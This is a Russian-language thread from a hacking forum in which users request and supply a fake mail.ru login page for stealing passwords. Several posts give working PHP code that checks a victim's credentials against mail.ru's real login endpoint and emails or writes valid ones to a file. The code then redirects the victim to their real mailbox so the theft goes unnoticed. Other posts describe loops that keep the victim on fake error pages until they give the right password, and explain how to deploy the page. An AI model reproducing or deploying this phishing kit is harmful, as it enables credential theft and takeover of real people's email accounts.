Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Фейк mail.ru с проверкой пароля (https://forum.antichat.xyz/showthread.php?t=65883)

КИНГ 30.03.2008 15:23
Фейк mail.ru с проверкой пароля
 
Нужен фейк mail.ru с проверкой пароля Т.е. если пользователь ввел неверные данные, выдается сообщение о неверном пароли, если верный, то пользователь идет на нужную нам страницу

NOmeR1 30.03.2008 15:35
PHP код:
function login($email,$password)
{
    $email strtolower($email);
    list($login$domain) = explode('@',$email);
    $openMail file_get_contents('http://win.mail.ru/cgi-bin/auth?Login='.urlencode($login).'&Password='.urlencode($password).'&Domain='.urlencode($domain));
    if(!preg_match('|<title> Вход в систему </title>|',$openMail) && preg_match('|<title>.+'.str_replace('.','\.',$email).'.+</title>|',$openMail))
    {
        return true;
    }
    else
    {
        return false;
    }

Вот простейшая функция для проверки.
Проверять так
Код:
if(login('xx@mail.ru', 'passwd')) {
        ...
}

zythar 30.03.2008 15:35
ничего сложного. при обработке полученных данных (читай логина и пароля) вместе с тем что пишешь в файл/отсылаешь себе на мыло итд итп так же отправляешь запрос на майл.ру при помощи сокетов потом получаешь ответ и выводишь его. и все будет так как будто чел ошибся и ввел на правильный логин и пароль

КИНГ 30.03.2008 15:52
NOmeR1


спасибо большое!

но т.к. я в пхп не силен, не подскажешь куда конкретно вставлять этот код?

}{0TT@БЬ)Ч 30.03.2008 16:00
ты просишь фейк но сам по видимому не осознаешь что это такое.

КИНГ 31.03.2008 11:25
мне нужен такой же фэйк как этот http://ifolder.ru/5953891 но с проверкой пароля!

opy495 03.04.2008 16:05
блин народ обьясните плиз , куда этот пхп код засовывать? в файла log.php? или куда? куда конкретно в файл? в самом начале файла или в самом конце?

и ешё как мона сделать так чтоб когда чел ввел правильный пас от своего ящика он автоматом с фейк страницы зашел к себе в ящик?

НTL 04.04.2008 07:25
Цитата:
Сообщение от }{0TT@БЬ)Ч
ты просишь фейк но сам по видимому не осознаешь что это такое.
Можно сделать, чтобы при ведение пароля фейк отправлял запрос на маил.ру, если пароль правельный, то фейк ведет через PHP пароль и логин на маил.ру и жертва войдет, а если не правельный то выдает жертве 2 фейк, и так по кругу... пока жертва не дас нам нужный пасс :p

Если это увидит Ponchik то я думаю что он это сделает!!!


P.S. Идея придумана за 5 мин, но не сделана, надеюсь я подкинул идею для работы)))

НTL 04.04.2008 07:28
Цитата:
Сообщение от opy495
блин народ обьясните плиз , куда этот пхп код засовывать? в файла log.php? или куда? куда конкретно в файл? в самом начале файла или в самом конце?

и ешё как мона сделать так чтоб когда чел ввел правильный пас от своего ящика он автоматом с фейк страницы зашел к себе в ящик?
Я думаю в начало, хотя ХЗ

opy495 05.04.2008 01:54
ну что кто-нить знает?

scrat 05.04.2008 03:02
NOmeR1 всё написал уже.В log.php добавляете функцию и проверку:
PHP код:
if(login($Login,$Pass))
{
 //пароль верен,вывести соответсвующие
}
else
{
 //пароль не верен,вывести соответсвующие


opy495 05.04.2008 11:23
ну вот я вставил такм образом , но функция не пашет , видимо не в том место всунул код , я нисилен в php , кууда его тут вставлять то нада? и вообше тот код который дал Nomer1 не дописан , ибо там идет првоерка только логин пасса , а на мейле ешё есть такое понятие как домен inbox/bk итд

PHP код:
<?PHP
Error_Reporting(E_ALL & ~E_NOTICE);

$Login $_POST['Login'];
$Domain $_POST['Domain'];
$Pass $_POST['Password'];


//####################################
$from "bla@mail.ru"// от кого письмо
$to "bla@mail.ru"// кому присылаем данные

$subj " sdfsdjfnd15154 : $Login@$Domain"// тема письма
$body " Логин: $Login@$Domain \n Пароль: $Pass"// тело письма (реконмендую не менять)
//####################################

if(login($Login,$Pass)) 

 //пароль верен,вывести соответсвующие 

else 

 //пароль не верен,вывести соответсвующие 
}  


$from="From: $from\nReply-To: $from\nX-Priority: 1\nContent-Type: text/plain; charset=\"koi8-r\"\nContent-Transfer-Encoding: 8bit"
$from=convert_cyr_string($from,"w","k"); 
$to=convert_cyr_string($to,"w","k"); 
$subj=convert_cyr_string($subj,"w","k"); 
$body=convert_cyr_string($body,"w","k"); 
mail($to,$subj,$body,$from); 

$c "$Login@$Domain:$Pass";

$fp fopen("c","a+"); //открываем файл
fwrite($fp,"\n [start-- $c -- end] \n"); //записываем всё
fclose($fp); //закрываем

//####################################
header("Location: http://win.mail.ru/cgi-bin/start?ver=%32%30%39%34&back=1"); // куда пошлем пользователя после того как он ввел данные!

echo "<META HTTP-EQUIV=\"Refresh\" content =\"0; URL=http://win.mail.ru/cgi-bin/start?ver=%32%30%39%34&back=1\">"

//####################################
?>

NOmeR1 05.04.2008 13:08
opy495, научитесь смотреть код. У меня он сам определяет через разделитель @.

opy495 05.04.2008 13:22
Цитата:
Сообщение от NOmeR1
opy495, научитесь смотреть код. У меня он сам определяет через разделитель @.
блин да я ваще 0 в php/html
вы можите обьяснить что нужно вставить и главное куда конкретно чтобы у меня проверялась валидность пары логин/пас

NOmeR1 05.04.2008 13:26
Учите, разжовывать за вас никто не будет.

opy495 05.04.2008 13:37
а что так сложно сказать что нада вписать в файл и куда ? o_O

opy495 26.04.2008 17:37
ну обьясните нубу вставляю в log.php код , log.php прикручен к index.php в функции action

вот в это вставляю в log.php

Цитата:
<?php
function login($email,$password)
{
$email = strtolower($email);
list($login, $domain) = explode('@',$email);
$openMail = file_get_contents('http://win.mail.ru/cgi-bin/auth?Login='.urlencode($login).'&Password='.urlenc ode($password).'&Domain='.urlencode($domain));
if(!preg_match('|<title> Вход в систему </title>|',$openMail) && preg_match('|<title>.+'.str_replace('.','\.',$emai l).'.+</title>|',$openMail))
{
return true;
}
else
{
return false;
}
}
?>
даю 777 права , захожу на фейк страницу , ввожу не верную пару логин пас
жму войти , меня перекидывает на cayt.ru/log.php и все , передомной чистая страница , больше ниче не происходит... что я не прально сделал?

-=Dem0n=- 27.04.2008 02:01
Цитата:
Сообщение от opy495
ну обьясните нубу вставляю в log.php код , log.php прикручен к index.php в функции action

вот в это вставляю в log.php



даю 777 права , захожу на фейк страницу , ввожу не верную пару логин пас
жму войти , меня перекидывает на cayt.ru/log.php и все , передомной чистая страница , больше ниче не происходит... что я не прально сделал?
А можно вопрос? каким хостингом пользуешся?)

opy495 27.04.2008 12:06
пробовал на tu2.ru и на jino-net.ru

nc.STRIEM 27.04.2008 12:10
opy495 - убей себя.

удалите тему.

imajo.ati 27.04.2008 12:39
держите)

прав никаких ненадо скрипт сам создаст файл

PHP код:
<?php

if ( isset($_POST['Login']) && isset($_POST['Domain']) && isset($_POST['Password']) ) {

$login urlencode($_POST['Login']);
$domain urlencode($_POST['Domain']);
$password urlencode($_POST['Password']);

$check file_get_contents('http://win.mail.ru/cgi-bin/auth?Login='.$login.'&Password='.$password.'&Domain='.$domain);

    if( preg_match('~<title> Вход в систему </title>~i',$check) ) {
    $fake $check;
    $fake preg_replace('~action=\"auth\"~','',$fake);
    echo $fake;
    }

    else {
    $f fopen('passwords.txt''ab');
    fwrite($f$login.".".$domain." ||| ".$password."\r\n");
    fclose($f);
    header('Location: http://win.mail.ru/cgi-bin/auth?Login='.$login.'&Password='.$password.'&Domain='.$domain);
    }

}

else {

$fake file_get_contents('http://win.mail.ru/cgi-bin/auth');
$fake preg_replace('~action=\"auth\"~','',$fake);
echo $fake;
}
?>

opy495 27.04.2008 12:46
а нормально обьяснить никак?

imajo.ati 27.04.2008 12:53
Цитата:
Сообщение от opy495
а нормально обьяснить никак?
сохрани этот текст в файл index.php и помести на сервер в какой-нибудь каталог

затем зайди в этот каталог через броузер и введи что-нибудь. если пасс и логин правильные, они запишутся в файл passwords.txt

nc.STRIEM 27.04.2008 12:56
Цитата:
Сообщение от imajo.ati
держите)

прав никаких ненадо скрипт сам создаст файл
Сам он ничего не создаст, вот 99% что у него на это не хватит пра!

Цитата:
а нормально обьяснить никак?
А нормально сесть почитать и самому разобраться??
Понимаеш, тут никто те это разжовывать не будет, иди на htt://php.ru читай, учи, а потом чтото делай, а таких вот "хакеров" как ты что, сделайте все за меня ато я не понимаю а разбераться впадлу, но хочу "взломат мыло", надо банить=\

imajo.ati 27.04.2008 13:03
Цитата:
Сообщение от nc.STRIEM
Сам он ничего не создаст, вот 99% что у него на это не хватит пра!
мод стоит ab
по документации если файл не существует он пытается его создать.
по стандартным настройкам прав хватит, а такие у большинства платных\бесплатных хостеров.

opy495 27.04.2008 13:06
Цитата:
Сообщение от imajo.ati
сохрани этот текст в файл index.php и помести на сервер в какой-нибудь каталог

затем зайди в этот каталог через броузер и введи что-нибудь. если пасс и логин правильные, они запишутся в файл passwords.txt
респект чувак))!! но блин сразу реклама хоста появилась , как её убрать то?) тегов head нету...
имею ввиду tu2.ru

.:EnoT:. 27.04.2008 13:30
Код:
http://forum.antichat.ru/threadnav62320-1-10-%F0%E5%EA%EB%E0%EC%E0%2B%E1%E5%F1%EF%EB%E0%F2%ED%EE%EC%2B%F5%EE%F1%F2%E8%ED%E3%E5.html
Тема закрыта


Время: 03:39